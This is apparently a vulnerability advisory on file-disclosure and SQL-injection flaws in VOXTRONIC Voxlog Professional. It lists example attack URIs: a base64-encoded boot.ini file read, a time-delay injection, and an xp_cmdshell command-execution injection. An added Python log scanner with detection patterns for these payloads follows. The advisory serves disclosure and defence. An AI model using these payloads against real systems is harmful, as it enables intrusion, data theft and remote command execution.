VOXTRONIC Voxlog Professional Multiple Security Vulnerabilities
BID:52081
Info
| Bugtraq ID: | 52081 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Feb 20 2012 12:00AM |
| Updated: | Feb 20 2012 12:00AM |
| Credit: | J. Greil of SEC Consult Vulnerability Lab |
| Vulnerable: | VOXTRONIC Voxlog Professional 3.7.2.729, VOXTRONIC Voxlog Professional 3.7.0.633 |
| Not Vulnerable: | |
Discussion
VOXTRONIC Voxlog Professional is prone to a file-disclosure vulnerability and multiple SQL-injection vulnerabilities because it fails to properly sanitize user-supplied input.
A remote attacker can exploit these issues to obtain potentially sensitive information from local files on computers running the vulnerable application, or to modify the logic of SQL queries. A successful exploit may allow the attacker to compromise the software, retrieve information, or modify data; these may aid in further attacks.
VOXTRONIC Voxlog Professional 3.7.2.729 and 3.7.0.633 are vulnerable; other versions may also be affected.
Exploit / POC
Attackers can use a browser to exploit these issues.
The following example URIs are available:
http://www.example.com/voxlog/GET.PHP?v=ZmlsZT1DOi9ib290LmluaQ==
http://www.example.com/voxlog/sysstat/userlogdetail.php?load=1&idclient[1]=xxx);waitfor delay '0:0:5' --+
http://www.example.com/voxlog/sysstat/userlogdetail.php?load=1&idclient[1]=xxx);exec master..xp_cmdshell 'xxxxx' --+
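As an added example (not part of the advisory), a Python check a defender can run over web-server access-log request lines to spot both patterns shown above: it base64-decodes the GET.PHP `v=` parameter and looks for a `file=` value naming an absolute or traversal path, and it scans `idclient[]` values for the stacked-query markers in the example URIs. The sample request lines are constructed for the demonstration.

```python
import base64
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample request paths (not real log data); the first three
# mirror the advisory's example URIs, the last is a benign request.
SAMPLE_REQUESTS = [
    "/voxlog/GET.PHP?v=ZmlsZT1DOi9ib290LmluaQ==",
    "/voxlog/sysstat/userlogdetail.php?load=1&idclient[1]=xxx);waitfor delay '0:0:5' --+",
    "/voxlog/sysstat/userlogdetail.php?load=1&idclient[1]=xxx);exec master..xp_cmdshell 'xxxxx' --+",
    "/voxlog/sysstat/userlogdetail.php?load=1&idclient[1]=42",
]

# Markers of the stacked-query injection seen in the advisory URIs.
SQLI_MARKERS = re.compile(r"(waitfor\s+delay|xp_cmdshell|;\s*exec\b|--\s*$)", re.I)
# A decoded v= payload of the form file=<drive:/...>, file=/..., or file=../...
FILE_PATH = re.compile(r"file=([a-z]:[\\/]|/|\.\./)", re.I)


def decode_v(value):
    """Strictly base64-decode the GET.PHP v= parameter; None if it is not base64."""
    try:
        return base64.b64decode(value, validate=True).decode("latin-1")
    except (ValueError, UnicodeDecodeError):
        return None


def classify_request(request_path):
    """Return (kind, evidence) findings for one request path, empty if benign."""
    findings = []
    parts = urlsplit(request_path)
    params = parse_qs(parts.query, keep_blank_values=True)  # '+' becomes a space
    path = parts.path.lower()
    if path.endswith("/get.php"):
        for v in params.get("v", []):
            decoded = decode_v(v)
            if decoded and FILE_PATH.search(decoded):
                findings.append(("file-disclosure", decoded))
    if path.endswith("/userlogdetail.php"):
        for key, values in params.items():
            if key.startswith("idclient"):
                findings.extend(("sql-injection", v) for v in values if SQLI_MARKERS.search(v))
    return findings


def scan_requests(requests):
    """Run classify_request over many request paths; return only the hits."""
    return [(r, f) for r in requests for f in classify_request(r)]
```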
Solution / Fix
Solution:
Currently, we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
References
References:
- VOXTRONIC Homepage (VOXTRONIC)